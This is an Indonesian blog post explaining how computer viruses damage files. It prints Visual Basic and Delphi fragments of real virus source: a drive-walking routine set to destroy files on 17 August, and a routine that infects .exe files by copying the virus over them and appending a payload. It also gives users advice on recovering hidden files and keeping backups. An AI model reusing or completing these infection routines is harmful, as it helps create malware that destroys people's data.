Kebanyakan virus melakukan penyerangan (pengerusakan) terhadap file-file komputer korbannya Serangan virus ini yang sangat ditakuti oleh pengguna computer. Tetapi jika virus tersebut hanya melakukan penyebaran itu bukan masalah karena tidak melakukan pengerusakan jadi si korban tidak merasa begitu dirugikan. Lalu bentuk-bentuk serangan apa saja yang dilakukan virus pada file?
Bentuk-bentuk serangan yang dilakukan virus pada file:
1. Menghapus, memindahkan, menyembunyikan dan mengerusak file(harap jangan sampai merusak isi file karena sapa tahu file itu sangat penting mungkin file tersebut tulisan skripsi atau apalah yang tentunya begitu berarti bagi user(patuhi saran vm yang baik )
2. Infeksi terhadap file, biasanya virus melakukan ini untuk melindungi dirinya dengan cara menempel dirinya pada file yang ingin di infeksi. Biasanya file*.exe, *.com, dll.
3. Memformat partisi dan menghapus partisi (harap bagi vm jangan lakukan ini karena selain memusnahkan virus sendiri juga memusnahkankan data orang).
4. Menyembunyikan folder asli lalu membuat folder palsu dengan nama yang sama tetapi folder tersebut sebenarnya adalah file virus berekstensi .exe hal ini juga dapat dilakukan pada file dengan ekstensi2 tertentu yang diinginkan sang vm untuk dibuat file palsunya.
Bentuk-bentuk serangan diatas adalah bentuk serangan yang paling sering dilakukan oleh virus untuk melakukan manipulasi terhadap suatu file . Menghapus, memindahkan dan menyembunyikan file merupakan hal yang sangat sering digunakan oleh virus. Bahkan hampir semua virus menggunakan tehnik ini untuk melakukan manipulasi terhadap suatu file. Infeksi terhadap file exe, com, dan scr sangat jarang ditemukan karena teKnik ini cukup sulit dilakukan
Gambar didatas adalah source virus merdeka yang saya dapatkan dari teman saya Riyanto virus ini cukup sadis karena melakukan format pada tanggal yang sudah ditentukan oleh sang VM(17-08):
TanggAl = Format(Now, "dd-mm")
If TanggAl = ("17-08") Then
GetFiles sdrive, True, "*.*"
End If
harap bagi vm jangan lakukan ini karena selain memusnahkan virus sendiri juga memusnahkan data orang.
Selain melakukan format virus ini juga melakukan pencemaran pada file berekstensi .exe lalu dilakukan penambahan ekstensi didepan ekstensi asli tersebut dengan ekstensi-ekstensi yang sudah didaftar oleh
VM:
Sub NyaRi()
Dim TanggAl
Dim ictr As Integer
Dim sdrive As String
For ictr = 68 To 90
sdrive = Chr(ictr) & ":\"
'ekstensi yang akan di tambahkan sebelum ekstensi .exe
GetFiles sdrive, True, "*.txt"
GetFiles sdrive, True, "*.pdf"
GetFiles sdrive, True, "*.rtf"
TanggAl = Format(Now, "dd-mm")
If TanggAl = ("17-08") Then
GetFiles sdrive, True, "*.*"
End If
End Sub
Jadi misal Komputer telah terinfeksi virus ini lalu kita menyolokkan flashdisk yang didalamnya terdapat file misal KaHt.exe file tersebut akan di manipulasi oleh virus tersebut sehingga menjadi file peranakan virus dengan nama KaHt.txt.exe (catatan oleh antivirus biasanya double ekstensi ini sudah sangat dicurigai sebagai virus /FakeExtention). Ada pula virus build-an Delphi yang bisa memanipulasi file
Pertama lakukan prosedur pencarian file dengan ekstensi.exe
If UpperCase(ExtractFileExt(Sr.Name)) = UpperCase('exe') Then InfeksiFile(Dir + Sr.Name);
//cari ekstensi .exe lalu lakukan infeksi file
UpperCase = function UpperCase
berisi indentifikasi nama file yang akan di racuni
if (Ch >= 'a') and (Ch <= 'z') then Dec(Ch, 32); //untuk membaca nama file
dimana Ch: Char;
ExtractFileExt=function ExtractFileExt
Result := Copy(Filename, i + 1, Length(Filename)); //meng-copy dgn filename sama + size(1)
lalu lakukan infeksi file:
CopyFile(pChar(ParamStr(0)), pChar(Name), False) Then Exit;
Settings := #00 + GenerateName + #02 + IntToStr(Length(FileBuffer)) + #01;
AssignFile(F, Name);
Append(F);
Write(F, FileBuffer);
Write(F, Settings); //tulis file f + setting (manipulasi)
CloseFile(F);
Hasil dari infeksi file ini adalah misal computer telah terinfeksi virus ini lalu kita menyolokkan flashdisk yang didalamnya terdapat file misal KaHt.exe file tersebut akan di manipulasi oleh virus tersebut sehingga menjadi file peranakan virus dengan nama KaHt.exe (tetapi icon file tersebut bukan ikon sebenarnya melainkan telah dirubah menjadi sama seperti icon file induk virus,menandakan bahwa file tersebut sudah dimanipulasi oleh virus) begitulah ulah-ulah virus pada file jadi setelah mengetahui tingkah laku virus yang sudah saya terangkan
apa anda hanya akan menjadi naive user (user awam) yang masa bodoh? Menyerahkan semuanya pada antivirus atau orang yang pinter komputer? Lalu misal data/document di komputer/flashdisk tiba2 lenyap dimakan virus (dimakan emang laper virusnya?) lalu apa yang anda lakukan? Cek dulu benar2 di delete oleh virus atau hanya di hidden aja? Caranya klik Tool-Folder Options- View- pilih Show Hidden Files and Folders sekalian hilangkan ceklist pada Hide protected operating system files (Recommendet)- Ok .Nah keliatankan kalo Cuma dihidden yah tinggal hilangkan attribute hiddennya selesai kan?data telah kembali seperti sediakala. Namun jika data/document tersebut di delete oleh virus maka anda harus melakukan restor (restor pakai apa? Pakai software Restoration banyak kok cari sendiri yah hehehe )
Saran saya lakukan back-up atas data-data pribadi anda terutama data-data yang sangat penting ,burning, simpan di flashdisk,komputer temen dll jadi klo-kalo kena virus dan data hilang masih mempunyai cadangannya. Jika tidak sempat di back-up saya punya trick simpan aja di internet misal di 4shared, ziddu, rapidshare,dll tapi ingat data yang penting di pack dan dilengkapi password biar aman hehehe
Virus dan ulahnya di file yang terjangkit
Reviewed by Wahyumiftahulhuda
on
Oktober 05, 2013
Rating:
Tidak ada komentar: